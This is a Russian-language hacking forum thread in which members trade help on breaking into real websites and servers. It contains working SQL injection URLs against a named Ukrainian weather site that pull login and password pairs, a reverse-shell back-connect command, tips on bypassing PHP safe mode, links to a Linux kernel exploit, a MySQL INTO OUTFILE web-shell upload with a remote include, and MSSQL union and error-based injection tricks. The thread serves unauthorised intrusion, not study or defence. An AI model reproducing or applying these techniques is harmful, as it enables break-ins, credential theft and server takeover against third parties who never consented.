Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а как пробовал запускать уже?
     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    perl back.pl [ip] 53
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а ты попробуй через бинарник сишный, баш, другой порт, бекконект встроенный в WSO2 тот же - отличная вещь, как практика показывает

    PS: Порт повыше бери
     
    #11363 Pashkela, 12 Feb 2010
    Last edited: 12 Feb 2010
  4. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Если включен сейф-мод, то надо обходить, запуском бинарного бека вместо перлового - не обойдешь СМ.
     
    2 people like this.
  5. SENIA

    SENIA Elder - Старейшина

    Joined:
    22 Nov 2008
    Messages:
    478
    Likes Received:
    232
    Reputations:
    1
    Можно ли выполнить комманду если:

    Code:
    Disable functions : symlink, dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, imap_open, imap_body,imap_list, imap_createmailbox, imap_deletemailbox, imap_renamemailbox, mb_send_mail
     
  6. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4--
    там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!
     
  7. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Вполне себе существует таблица users с полями login и password:

    Code:
    http://www.pogoda.ua/index.php?id=-1+union+select+0,concat_ws(0x3a,login,password),2,3,4+from+users--
    Уж к чему-то, но они подходят.

    Кроме того, прокатывает запрос вида:
    Code:
    http://www.pogoda.ua/index.php?id=-1+union+select+0,'1',2,3,4--
    Подозреваю, что разрешены кавычки, но не уверен - попробовал прочитать файл через load_file(), - не вышло. Думаю, из-за того что файловых прав нет.
     
  8. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    2.6.25 есть эксплоит?
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
     
  10. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Извините за глупость... Помогите скомпилить сплойт,желательно под винду, но и линухом не побрезгую. Ну не знаю я си (

    http://milw0rm.com/exploits/98


    Заранее благодарен.
     
  11. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Не знаю, у меня его замечательно расшифровал passcracking.ru . Проблема в том, что этот логин\пароль к админке не подошёл. Нужно дальше таблицы брутить.
     
  12. 3acuson

    3acuson Member

    Joined:
    31 Jan 2010
    Messages:
    426
    Likes Received:
    5
    Reputations:
    0
    прошу помощи есть полный доступ к бд сайта
    каким тыком залить на сайт шелл через mysql?
    select '<? @include("http://moysite.ru/shell.php"); ?>' into outfile 'сервак стоит на винде'
    после заливки открывает пустую страницу
    <?php system($cmd) ?> тоже непомог
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    <?phpinfo();?> для начала попробуй залить, заодно увидишь, разрешен ли allow_url_include, allow_url_fopen и system, и еще много чего инетересного увидишь
     
    #11373 Pashkela, 13 Feb 2010
    Last edited: 13 Feb 2010
    1 person likes this.
  14. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Моя очередь вам мозг убить
    Есть скуля - MSSQL
    тама идёт запрос SELECT * FROM table WHERE id = #id#
    id=1 OR 1=@@version = SQL Server 2000
    Тоесть есть вывод через ошибки, обычный вывод - геморой, тута страницы 2 надо чоб описать всё, поэтому вопрос про вывод через ошибки
    Я знаю структуру БД, такчто таблы мне искать ненад
    Мне надо выбить инфу из таблы, вот токо на сайте фильтруются символы
    %()[]
    Чё делать :eek:
    P.S. Про обычный вывод - UNION SELECT... тама 69 поля, и если типы не совпадают - выбивает ошибку, а как я могу узнать в каком поле не совпадают типы =\
    И всёже - чё делать с ошибкой
    гугл говорит заюзать чётотам(varchar(9000)) но скобки запрещены, немогу :(
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    если скобки запрещены - ничего не сделать, вроде бы, инвертировать не получится

    PS: но это если скобки действительно запрещены, а так convert(куда_конверт,system_user)
     
  16. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    сначала указываешь для всех полей null, потом последовательно подставляешь строки и смотришь в каком по счету поле не будет ошибки.
    UNION ALL SELECT
     
  17. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Pashkela, скобки точно запрещены
    Указывал все нуллы, всёравно говорит
    The text, ntext, or image data type cannot be selected as DISTINCT.
    даже указывал
    -1 UNION SELECT * FROM %табла, которая используется в запросе%
    Опять гвоорит этуже ошибку
    В мелкософте какраз такой случай разбирается, но тама скобки нужны
    А вот это непонял куда
    1 UNION ALL SELECT = Incorrect syntax near 'SELECT'
     
  18. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    правильно, а теперь совмести то, что я сказал про null'ы и ALL SELECT
    1 UNION ALL SELECT null,null,null...
     
    1 person likes this.
  19. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Хмммм... хз как, но оно кажись получается, токо надо теперь поля под типы подобрать, цёма
    Эммм... А как лимит заюзать
    LIMIT 0,1 говорит Incorrect syntax near '0'
    я знаю, чо надо юзать NOT IN() но нужны скобки :(
    чё делать
    =====
    всё, нащёл - ... WHERE column!='value'
     
    #11379 Ponchik, 13 Feb 2010
    Last edited: 13 Feb 2010
  20. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Если нужно вытянуть всю базу..
    column>'x'
    И ставишь на цикл, каждый раз меняя значение x на новое, вообщем всё просто.
     
    #11380 v1d0qz, 13 Feb 2010
    Last edited: 15 Feb 2010
Thread Status:
Not open for further replies.